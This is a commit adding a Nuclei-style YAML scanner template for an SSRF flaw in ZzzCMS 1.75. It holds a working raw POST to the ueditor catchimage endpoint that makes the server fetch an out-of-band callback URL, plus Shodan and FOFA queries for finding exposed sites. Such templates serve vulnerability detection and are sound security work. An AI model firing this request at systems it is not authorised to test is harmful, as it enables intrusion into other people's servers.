Create zzzcms-ssrf.yaml

patch-1
Ritik Chaddha 2023-08-07 23:26:09 +05:30 committed by GitHub
parent 73adc3c1bf
commit 75159ca8e2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 41 additions and 0 deletions

View File

@ -0,0 +1,41 @@
id: zzzcms-ssrf
info:
name: ZzzCMS 1.75 - Server-Side Request Forgery
author: ritikchaddha
severity: high
reference:
- https://www.hacking8.com/bug-web/Zzzcms/Zzzcms-1.75-ssrf.html
metadata:
max-request: 1
verified: true
shodan-query: html:"ZzzCMS"
fofa-query: title="ZzzCMS"
tags: zzzcms,ssrf
http:
- raw:
- |
POST /plugins/ueditor/php/controller.php?action=catchimage&upfolder=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
source[0]=http://{{interactsh-url}}/1.txt
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body
words:
- '{"state":'
- 'list":'
condition: and
- type: status
status:
- 200